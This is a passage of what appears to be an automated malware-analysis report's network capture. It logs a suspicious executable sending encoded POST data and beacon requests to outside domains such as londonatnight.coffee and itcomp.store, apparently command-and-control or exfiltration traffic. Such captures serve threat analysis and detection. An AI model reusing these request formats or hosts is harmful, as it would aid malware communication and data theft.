                                                                                          Data Ascii: T4OdNH=vMVYSiVsBjs+LDuBZTrSBkJihMaXu9unqFY7tJsFmo/lNIY3LrsjFn4TBc5qyS7oAGEa1uOoXTKjCqA1dcY/z2rxVKrtdw+UkVU0YMueOomNNDQHTL1nb32Hur0ACMv8sdIp74QrG98ZpcRLotu4VOtF7vO7OYFpykQw//YugC8n2Wm5PuFtlEuQ8NmwDw9T83ETUW78TuWAET9QMBqojKiyEqNq+nwwDDH6WoSorDBQnNlHaXe9KKmt0S/qeC6hzYj9oEk//V3BagHeBCETHuPML4I0QdbMyvn1V46/8xcq/+LMa9+McJcYpoKXglJaguXQCiyIxFD8kf5e2DLwU/sgLER333KO3ok4LFJ5hTUuqpQiLF2p+Kt/hlMBdyGaiMqrN4DVBXwTLwTb+cPhx9vFCYGr5s37mh/OrI+9uie8Etco7ED+8mRUqgA96hY0lMY9DWU5kW+HRlxI8c2L9TIYfeEcfI9BZkgzxbHf6s8C2ew+veSizA+yPW4jjQ6z0DJTGnCBe1cq2SgUWLwdj9mpstrLihknYNkbbXt+fxEcV1dx58D9rp79AA7PGWu4YJu6B4d7/+yuoNi0P8gFDuKzq1qoBT3LfJQy9oMC7w73KFKBX6UmawrxTffgPDsTZ0da7fNr4AyYjZwZEVCiqcS/gaYkxMdKrYDMdWx17xvk3zHxMnZeeZQ0lc0WrBN4kJFxNK6xCa+B1oHW/eC13tWv5cB6HvP/FiRBG/gy8EPo8ckEQr8WeikBkLlZRsUz0uv3kmttOh4hWHgYEEqeNwBV/fSjm/5mGZpIs3aa8qnElwKONoEeOzOMYBE8tbtmNQ+2NJH5Kzl4aS6pqmUvG5AlHe8oxDWQGbLFz+R2L6Dki0NVpDPbptsYczFiMT2ar51tEClVjxnVWa21ZXsuApZSU6EN2gwp9SJi02xoE9aNxd8APVtlKiZVpYBedIPwf1lMkpgQuP35fIHw7UlEYY/B0ofhL61ICXGYdN/7XyheU [TRUNCATED]
                                                                                          Jan 8, 2025 15:01:35.619435072 CET193INHTTP/1.1 302 Found
                                                                                          Date: Wed, 08 Jan 2025 14:01:35 GMT
                                                                                          Content-Length: 0
                                                                                          Connection: close
                                                                                          Location: https://laduta.xyz/5mxq
                                                                                          X-Served-By: Namecheap URL Forward
                                                                                          Server: namecheap-nginx


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          28192.168.2.650004192.64.119.109802300C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 8, 2025 15:01:37.583431005 CET511OUTGET /5mxq/?T4OdNH=iO94RS5UfBQ5HC+BbRXYGHpdoey0nMmihjIqhakPtq2eYvg9AqcPAmRUPZBNji7wd38qvvn/XQ+Vfr9uTuQ/zSitIKONVg6W4BJ6U8+dApebSQkrfqhDfnKkuLJ5c8X1k/dz1dA=&r4=tP5HWLt8wXstw4H HTTP/1.1
                                                                                          Host: www.laduta.xyz
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Jan 8, 2025 15:01:38.065567970 CET623INHTTP/1.1 302 Found
                                                                                          Date: Wed, 08 Jan 2025 14:01:38 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 217
                                                                                          Connection: close
                                                                                          Location: https://laduta.xyz/5mxq?T4OdNH=iO94RS5UfBQ5HC+BbRXYGHpdoey0nMmihjIqhakPtq2eYvg9AqcPAmRUPZBNji7wd38qvvn%2FXQ+Vfr9uTuQ%2FzSitIKONVg6W4BJ6U8+dApebSQkrfqhDfnKkuLJ5c8X1k%2Fdz1dA%3D&r4=tP5HWLt8wXstw4H
                                                                                          X-Served-By: Namecheap URL Forward
                                                                                          Server: namecheap-nginx
                                                                                          Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 6c 61 64 75 74 61 2e 78 79 7a 2f 35 6d 78 71 3f 54 34 4f 64 4e 48 3d 69 4f 39 34 52 53 35 55 66 42 51 35 48 43 2b 42 62 52 58 59 47 48 70 64 6f 65 79 30 6e 4d 6d 69 68 6a 49 71 68 61 6b 50 74 71 32 65 59 76 67 39 41 71 63 50 41 6d 52 55 50 5a 42 4e 6a 69 37 77 64 33 38 71 76 76 6e 25 32 46 58 51 2b 56 66 72 39 75 54 75 51 25 32 46 7a 53 69 74 49 4b 4f 4e 56 67 36 57 34 42 4a 36 55 38 2b 64 41 70 65 62 53 51 6b 72 66 71 68 44 66 6e 4b 6b 75 4c 4a 35 63 38 58 31 6b 25 32 46 64 7a 31 64 41 25 33 44 26 72 34 3d 74 50 35 48 57 4c 74 38 77 58 73 74 77 34 48 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                                                                                          Data Ascii: <a href='https://laduta.xyz/5mxq?T4OdNH=iO94RS5UfBQ5HC+BbRXYGHpdoey0nMmihjIqhakPtq2eYvg9AqcPAmRUPZBNji7wd38qvvn%2FXQ+Vfr9uTuQ%2FzSitIKONVg6W4BJ6U8+dApebSQkrfqhDfnKkuLJ5c8X1k%2Fdz1dA%3D&r4=tP5HWLt8wXstw4H'>Found</a>.


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          29192.168.2.65000513.248.169.48802300C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 8, 2025 15:01:43.120274067 CET790OUTPOST /13to/ HTTP/1.1
                                                                                          Host: www.londonatnight.coffee
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Origin: http://www.londonatnight.coffee
                                                                                          Referer: http://www.londonatnight.coffee/13to/
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 211
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Data Raw: 54 34 4f 64 4e 48 3d 2b 30 73 41 72 36 55 53 38 67 51 35 38 6a 39 46 38 6d 58 66 39 45 68 4c 57 36 4c 4f 6d 2b 46 71 2b 36 6c 34 68 77 44 2f 34 79 63 4b 58 72 62 33 48 74 33 76 6a 68 6e 53 73 52 49 43 49 43 6c 67 6a 47 78 6e 44 68 6e 6b 6b 4e 6c 51 66 64 4b 41 67 4c 35 4c 33 68 6d 57 70 50 48 45 64 66 66 32 39 4d 61 6f 54 47 67 48 39 64 49 63 34 31 72 38 66 34 36 4c 37 39 50 73 65 52 30 50 74 53 46 63 74 77 51 4a 46 38 41 74 48 77 6b 41 41 6e 77 74 51 78 48 76 68 4a 45 79 45 37 52 4e 4a 74 69 74 77 77 51 6b 63 51 69 75 72 65 31 73 51 2b 38 4d 2b 77 4e 42 6f 78 39 38 67 48 69 67 4c 34 68 51 36 6c 4f 47 65 64 74 35 63 42 35 68
                                                                                          Data Ascii: T4OdNH=+0sAr6US8gQ58j9F8mXf9EhLW6LOm+Fq+6l4hwD/4ycKXrb3Ht3vjhnSsRICIClgjGxnDhnkkNlQfdKAgL5L3hmWpPHEdff29MaoTGgH9dIc41r8f46L79PseR0PtSFctwQJF8AtHwkAAnwtQxHvhJEyE7RNJtitwwQkcQiure1sQ+8M+wNBox98gHigL4hQ6lOGedt5cB5h
                                                                                          Jan 8, 2025 15:01:43.592567921 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                          content-length: 0
                                                                                          connection: close


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          30192.168.2.65000613.248.169.48802300C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 8, 2025 15:01:45.674020052 CET814OUTPOST /13to/ HTTP/1.1
                                                                                          Host: www.londonatnight.coffee
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Origin: http://www.londonatnight.coffee
                                                                                          Referer: http://www.londonatnight.coffee/13to/
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 235
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Data Raw: 54 34 4f 64 4e 48 3d 2b 30 73 41 72 36 55 53 38 67 51 35 36 44 74 46 73 31 2f 66 70 55 68 45 5a 61 4c 4f 76 65 46 55 2b 36 68 34 68 7a 50 56 34 47 77 4b 57 4f 6e 33 45 73 33 76 75 42 6e 53 6e 78 4a 70 56 53 6c 52 6a 47 38 4e 44 67 72 6b 6b 4e 78 51 66 66 53 41 6a 34 52 55 30 52 6d 55 79 66 48 61 51 2f 66 32 39 4d 61 6f 54 47 30 39 39 64 41 63 35 47 44 38 65 61 53 4d 6e 74 50 6a 55 78 30 50 6d 79 46 59 74 77 51 76 46 39 64 36 48 31 67 41 41 6c 6f 74 51 67 48 75 76 35 45 77 62 72 51 4f 4a 73 50 64 34 44 35 67 66 41 75 39 36 38 51 50 63 6f 68 57 69 44 4e 69 36 68 64 2b 67 46 36 53 4c 59 68 36 34 6c 32 47 4d 4b 68 65 54 31 63 43 74 49 51 56 70 51 6e 4e 74 59 49 48 67 42 70 57 35 45 6a 73 36 67 3d 3d
                                                                                          Data Ascii: T4OdNH=+0sAr6US8gQ56DtFs1/fpUhEZaLOveFU+6h4hzPV4GwKWOn3Es3vuBnSnxJpVSlRjG8NDgrkkNxQffSAj4RU0RmUyfHaQ/f29MaoTG099dAc5GD8eaSMntPjUx0PmyFYtwQvF9d6H1gAAlotQgHuv5EwbrQOJsPd4D5gfAu968QPcohWiDNi6hd+gF6SLYh64l2GMKheT1cCtIQVpQnNtYIHgBpW5Ejs6g==


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          31192.168.2.65000713.248.169.48802300C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 8, 2025 15:01:48.229684114 CET1827OUTPOST /13to/ HTTP/1.1
                                                                                          Host: www.londonatnight.coffee
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Origin: http://www.londonatnight.coffee
                                                                                          Referer: http://www.londonatnight.coffee/13to/
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 1247
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Data Raw: 54 34 4f 64 4e 48 3d 2b 30 73 41 72 36 55 53 38 67 51 35 36 44 74 46 73 31 2f 66 70 55 68 45 5a 61 4c 4f 76 65 46 55 2b 36 68 34 68 7a 50 56 34 48 6b 4b 57 34 7a 33 65 4c 4c 76 76 42 6e 53 75 52 49 4f 56 53 6c 32 6a 47 6b 4a 44 67 33 53 6b 4f 4a 51 65 38 61 41 69 4e 74 55 76 42 6d 55 37 2f 48 48 64 66 65 30 39 4d 4b 7a 54 47 6b 39 39 64 41 63 35 41 2f 38 4b 34 36 4d 33 64 50 73 65 52 31 62 74 53 46 38 74 77 4a 55 46 39 59 48 62 57 59 41 44 46 34 74 44 44 76 75 70 70 45 2b 61 72 51 73 4a 73 44 43 34 43 56 47 66 42 71 58 36 2f 4d 50 65 64 55 30 31 43 30 31 67 68 4e 69 77 56 75 6c 45 6f 68 45 34 32 4b 2f 4c 72 35 65 64 45 6c 73 72 74 6c 4a 70 69 32 71 76 34 31 72 2f 33 59 64 77 48 79 33 6e 4a 53 6e 49 30 51 78 39 64 4b 67 74 63 65 65 49 31 69 37 4a 55 5a 77 76 74 53 37 61 7a 64 47 62 6c 2f 55 62 30 7a 67 78 66 7a 77 72 47 36 65 4a 49 36 37 70 63 7a 30 70 47 51 37 51 7a 47 63 39 70 5a 38 72 48 53 78 58 59 76 4b 71 7a 4f 4e 59 4a 53 65 5a 41 52 73 36 52 51 32 58 4b 51 4c 63 56 74 76 5a 68 62 42 79 35 43 [TRUNCATED]
                                                                                          Data Ascii: T4OdNH=+0sAr6US8gQ56DtFs1/fpUhEZaLOveFU+6h4hzPV4HkKW4z3eLLvvBnSuRIOVSl2jGkJDg3SkOJQe8aAiNtUvBmU7/HHdfe09MKzTGk99dAc5A/8K46M3dPseR1btSF8twJUF9YHbWYADF4tDDvuppE+arQsJsDC4CVGfBqX6/MPedU01C01ghNiwVulEohE42K/Lr5edElsrtlJpi2qv41r/3YdwHy3nJSnI0Qx9dKgtceeI1i7JUZwvtS7azdGbl/Ub0zgxfzwrG6eJI67pcz0pGQ7QzGc9pZ8rHSxXYvKqzONYJSeZARs6RQ2XKQLcVtvZhbBy5C382ZRgoJjczsdOytu/qiX1BWGyMVyBulFRK8x/Sem0DsTJx9j7Xu7Tzcb6CmY4yg4ydqkogqBIuYUSgyZxR1CyCaLKwf4BNJkGrob5uTmA+2Ys45EFjULyfbhL8JY0XIuehqlwdMBfqcIf4y2im08p/3GGVi905FcSNsthlDKns15cY3WqhQnWM5YQYcv1ONwVAYSvVD3qCA0CIyvhqVMAPsllaUWCtvbi+ueajXf5dvOl8y318+mu1As5BMl9v+V7e0xTf15KCSGsG/Z8F4wpGWxEcxc9chCjqVd+i8/uOa20ilyUojgZY1mME1PP9RWKI4wwriQnI6r749nvNf+CjLLuc5m7KZ9VzTw8Mk64TAg2Rmm9SVbinK6JI1hOHOmW8ysTuucZILuLPUc84+XawN5E0YVu961P5725UP5B0HGBBl8JhPpsdiy78Jzvvkwb6GekvR0txLj7cmdxpO0l25rX5NiQaFfPgkrecoX9LOEdhokEuvzm2006UWTogvqPLmzHnLmDa9PGWa34zeClcMvgk02n55vMctvzS2XYfUy5iTQnkLZzLTsJ/SF42gmMvO9WMA0W0Hk9rTNAjX0/Y4M001pkXtRA9eOa2iQ4W/wmO8znQvcEzb9ASqeidQvd6YVVudKcHPj+Qq0eCNy6wzD42jbTChwy [TRUNCATED]


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          32192.168.2.65000813.248.169.48802300C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 8, 2025 15:01:50.774625063 CET521OUTGET /13to/?r4=tP5HWLt8wXstw4H&T4OdNH=z2EgoPQiqWsx10s8imXn9EhLUqHIpfNm2M9hnivL2yIwQ5T5ZMz+m2ngmAV/UVpa818CagjxjfYFH/Xhgr0dlnT3xa+eVvaI/ZjmdVMj8eQS2FfncZyG6J/yATIX4FRolS5bDYc= HTTP/1.1
                                                                                          Host: www.londonatnight.coffee
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Jan 8, 2025 15:01:52.254452944 CET398INHTTP/1.1 200 OK
                                                                                          content-type: text/html
                                                                                          date: Wed, 08 Jan 2025 14:01:52 GMT
                                                                                          content-length: 277
                                                                                          connection: close
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 72 34 3d 74 50 35 48 57 4c 74 38 77 58 73 74 77 34 48 26 54 34 4f 64 4e 48 3d 7a 32 45 67 6f 50 51 69 71 57 73 78 31 30 73 38 69 6d 58 6e 39 45 68 4c 55 71 48 49 70 66 4e 6d 32 4d 39 68 6e 69 76 4c 32 79 49 77 51 35 54 35 5a 4d 7a 2b 6d 32 6e 67 6d 41 56 2f 55 56 70 61 38 31 38 43 61 67 6a 78 6a 66 59 46 48 2f 58 68 67 72 30 64 6c 6e 54 33 78 61 2b 65 56 76 61 49 2f 5a 6a 6d 64 56 4d 6a 38 65 51 53 32 46 66 6e 63 5a 79 47 36 4a 2f 79 41 54 49 58 34 46 52 6f 6c 53 35 62 44 59 63 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?r4=tP5HWLt8wXstw4H&T4OdNH=z2EgoPQiqWsx10s8imXn9EhLUqHIpfNm2M9hnivL2yIwQ5T5ZMz+m2ngmAV/UVpa818CagjxjfYFH/Xhgr0dlnT3xa+eVvaI/ZjmdVMj8eQS2FfncZyG6J/yATIX4FRolS5bDYc="}</script></head></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          33192.168.2.650009103.247.11.204802300C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 8, 2025 15:01:59.219496965 CET766OUTPOST /vw2j/ HTTP/1.1
                                                                                          Host: www.itcomp.store
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Origin: http://www.itcomp.store
                                                                                          Referer: http://www.itcomp.store/vw2j/
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 211
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Data Raw: 54 34 4f 64 4e 48 3d 49 35 35 79 51 64 79 59 48 7a 39 4c 78 62 59 5a 79 31 33 42 38 4b 51 43 6d 39 56 78 31 58 6e 31 4a 41 4c 68 4d 71 41 46 39 31 77 75 34 59 4b 6f 31 48 73 69 52 76 73 2b 53 32 46 53 39 4f 70 68 72 66 30 37 43 41 56 52 58 77 30 32 4b 55 77 66 64 41 70 44 55 78 50 68 4f 39 31 78 39 58 74 47 54 46 69 49 4d 7a 74 30 2f 38 48 6d 42 75 47 56 78 78 41 4b 45 2f 51 57 37 42 6b 65 5a 57 67 34 75 5a 2f 70 35 50 63 67 68 4b 36 38 2b 33 51 69 76 31 4b 31 39 63 30 42 34 4e 6b 77 48 56 57 52 6a 4f 7a 34 49 6b 44 6a 34 66 57 35 77 38 47 75 2b 48 31 52 36 78 50 58 6b 76 51 71 31 38 6e 67 6f 6b 38 7a 45 39 2b 43 57 67 65 53
                                                                                          Data Ascii: T4OdNH=I55yQdyYHz9LxbYZy13B8KQCm9Vx1Xn1JALhMqAF91wu4YKo1HsiRvs+S2FS9Ophrf07CAVRXw02KUwfdApDUxPhO91x9XtGTFiIMzt0/8HmBuGVxxAKE/QW7BkeZWg4uZ/p5PcghK68+3Qiv1K19c0B4NkwHVWRjOz4IkDj4fW5w8Gu+H1R6xPXkvQq18ngok8zE9+CWgeS
                                                                                          Jan 8, 2025 15:02:00.151731014 CET479INHTTP/1.1 404 Not Found
                                                                                          Date: Wed, 08 Jan 2025 14:01:59 GMT
                                                                                          Server: Apache
                                                                                          Content-Length: 315
                                                                                          Connection: close
                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          34192.168.2.650010103.247.11.204802300C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 8, 2025 15:02:01.764235020 CET790OUTPOST /vw2j/ HTTP/1.1
                                                                                          Host: www.itcomp.store
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Origin: http://www.itcomp.store
                                                                                          Referer: http://www.itcomp.store/vw2j/
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 235
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Data Raw: 54 34 4f 64 4e 48 3d 49 35 35 79 51 64 79 59 48 7a 39 4c 77 35 4d 5a 78 53 62 42 30 4b 51 46 34 4e 56 78 2f 33 6e 78 4a 41 48 68 4d 75 77 76 39 47 55 75 35 34 36 6f 79 47 73 69 57 76 73 2b 64 57 45 59 7a 75 70 2f 72 66 77 7a 43 46 31 52 58 77 77 32 4b 56 41 66 64 7a 42 43 56 68 50 6a 58 4e 31 76 35 58 74 47 54 46 69 49 4d 77 52 53 2f 38 76 6d 43 66 32 56 78 55 38 4a 4e 66 51 56 34 42 6b 65 49 47 67 38 75 5a 2b 45 35 4d 59 4b 68 4d 32 38 2b 79 73 69 75 68 65 71 33 63 30 39 37 39 6b 37 4b 33 4c 44 6a 50 65 4c 4e 58 2f 77 37 59 4b 2b 31 4b 62 30 69 30 31 79 6f 68 76 56 6b 74 49 59 31 63 6e 4b 71 6b 45 7a 57 71 79 6c 5a 55 37 78 57 69 54 49 5a 79 33 41 6c 75 78 5a 4b 33 4d 34 58 41 48 57 6f 41 3d 3d
                                                                                          Data Ascii: T4OdNH=I55yQdyYHz9Lw5MZxSbB0KQF4NVx/3nxJAHhMuwv9GUu546oyGsiWvs+dWEYzup/rfwzCF1RXww2KVAfdzBCVhPjXN1v5XtGTFiIMwRS/8vmCf2VxU8JNfQV4BkeIGg8uZ+E5MYKhM28+ysiuheq3c0979k7K3LDjPeLNX/w7YK+1Kb0i01yohvVktIY1cnKqkEzWqylZU7xWiTIZy3AluxZK3M4XAHWoA==
                                                                                          Jan 8, 2025 15:02:02.760051012 CET479INHTTP/1.1 404 Not Found
                                                                                          Date: Wed, 08 Jan 2025 14:02:01 GMT
                                                                                          Server: Apache
                                                                                          Content-Length: 315
                                                                                          Connection: close
                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          35192.168.2.650011103.247.11.204802300C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 8, 2025 15:02:04.531076908 CET1803OUTPOST /vw2j/ HTTP/1.1
                                                                                          Host: www.itcomp.store
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Origin: http://www.itcomp.store
                                                                                          Referer: http://www.itcomp.store/vw2j/
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 1247
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
